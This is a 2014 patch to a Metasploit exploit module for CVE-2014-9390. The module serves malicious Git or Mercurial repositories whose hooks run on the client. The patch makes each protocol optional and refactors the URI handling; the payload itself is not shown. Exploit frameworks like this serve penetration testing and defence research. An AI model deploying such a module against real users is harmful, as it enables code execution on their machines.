From 6c8cecf895e11265801502e0a07f7cba39c0386d Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Mon, 22 Dec 2014 11:36:50 -0800 Subject: [PATCH] Make git/mercurial support toggle-able, default mercurial to off --- .../exploits/multi/http/git_cve_2014_9390.rb | 51 +++++++++++-------- 1 file changed, 31 insertions(+), 20 deletions(-) diff --git a/modules/exploits/multi/http/git_cve_2014_9390.rb b/modules/exploits/multi/http/git_cve_2014_9390.rb index 224117b79a..d5de52f996 100644 --- a/modules/exploits/multi/http/git_cve_2014_9390.rb +++ b/modules/exploits/multi/http/git_cve_2014_9390.rb @@ -61,16 +61,16 @@ class Metasploit4 < Msf::Exploit::Remote register_options( [ - OptString.new('GIT_URI', [true, 'The URI to use as the malicious Git instance', '/git']), - OptString.new('MERCURIAL_URI', [true, 'The URI to use as the malicious Git instance', '/hg']), + OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty to disable)', '/git']), + OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty to disable)', '']), OptString.new('URIPATH', [true, 'The URI to display the malicious repositories in', '/']) ] ) register_advanced_options( [ - OptString.new('GIT_HOOK', [true, 'The Git hook to use for exploitation', 'post-checkout']), - OptString.new('MERCURIAL_HOOK', [true, 'The Mercurial hook to use for exploitation', 'update']) + OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']), + OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update']) ] ) end @@ -80,13 +80,16 @@ class Metasploit4 < Msf::Exploit::Remote git: { files: {}, trigger: nil }, mercurial: { files: {}, trigger: nil } } - setup_git - setup_mercurial + if git_uri.blank? && mercurial_uri.blank? + fail ArgumentError, 'Must specify at least one non-blank GIT_URI or MERCURIAL_URI' + end + setup_git unless git_uri.blank? + setup_mercurial unless mercurial_uri.blank? end def setup_git - # sanity check the malicious URI - fail ArgumentError, 'GIT_URI must not be blank' if datastore['GIT_URI'].blank? + # URI must start with a / + fail ArgumentError, 'GIT_URI must start with a /' unless git_uri =~ /^\// # sanity check the malicious hook: fail ArgumentError, 'GIT_HOOK must not be blank' if datastore['GIT_HOOK'].blank? @@ -153,8 +156,8 @@ class Metasploit4 < Msf::Exploit::Remote end def setup_mercurial - # sanity check the malicious URI - fail ArgumentError, 'MERCURIAL_URI must not be blank' if datastore['MERCURIAL_URI'].blank? + # URI must start with a / + fail ArgumentError, 'MERCURIAL_URI must start with a /' unless mercurial_uri =~ /^\// # sanity check the malicious hook: fail ArgumentError, 'MERCURIAL_HOOK must not be blank' if datastore['MERCURIAL_HOOK'].blank? # TODO: build the fake repository @@ -175,8 +178,8 @@ class Metasploit4 < Msf::Exploit::Remote end def primer - hardcoded_uripath(datastore['GIT_URI']) - hardcoded_uripath(datastore['MERCURIAL_URI']) + hardcoded_uripath(git_uri) unless git_uri.blank? + hardcoded_uripath(mercurial_uri) unless mercurial_uri.blank? end def check_user_agent(cli, req, expected_ua_re = /^.+/) @@ -198,10 +201,10 @@ class Metasploit4 < Msf::Exploit::Remote def on_request_uri(cli, req) if (user_agent = req.headers['User-Agent']) - if user_agent =~ /^git\// && req.uri.start_with?(datastore['GIT_URI']) + if user_agent =~ /^git\// && req.uri.start_with?(git_uri) do_git(cli, req) return - elsif user_agent =~ /^mercurial\// && req.uri.start_with?(datastore['MERCURIAL_URI']) + elsif user_agent =~ /^mercurial\// && req.uri.start_with?(mercurial_uri) do_mercurial(cli, req) return end @@ -213,7 +216,7 @@ class Metasploit4 < Msf::Exploit::Remote def do_git(cli, req) # determine if the requested file is something we know how to serve from our # fake repository and send it if so - req_file = URI.parse(req.uri).path.gsub(/^#{datastore['GIT_URI']}/, '') + req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '') if @repo_data[:git][:files].key?(req_file) vprint_status("Sending Git #{req_file}") send_response(cli, @repo_data[:git][:files][req_file]) @@ -232,16 +235,16 @@ class Metasploit4 < Msf::Exploit::Remote def do_html(cli, _req) resp = create_response - git_uri = URI.parse(get_uri).merge(datastore['GIT_URI']) - mercurial_uri = URI.parse(get_uri).merge(datastore['MERCURIAL_URI']) + this_git_uri = URI.parse(get_uri).merge(git_uri) + this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri) resp.body = < Public Repositories

Here are our public repositories:

@@ -253,7 +256,7 @@ HTML def do_mercurial(cli, req) # determine if the requested file is something we know how to serve from our # fake repository and send it if so - req_file = URI.parse(req.uri).path.gsub(/^#{datastore['MERCURIAL_URI']}/, '') + req_file = URI.parse(req.uri).path.gsub(/^#{mercurial_uri}/, '') if @repo_data[:mercurial][:files].key?(req_file) vprint_status("Sending Mercurial #{req_file}") send_response(cli, @repo_data[:mercurial][:files][req_file]) @@ -269,4 +272,12 @@ HTML send_not_found(cli) end end + + def git_uri + datastore['GIT_URI'] + end + + def mercurial_uri + datastore['MERCURIAL_URI'] + end end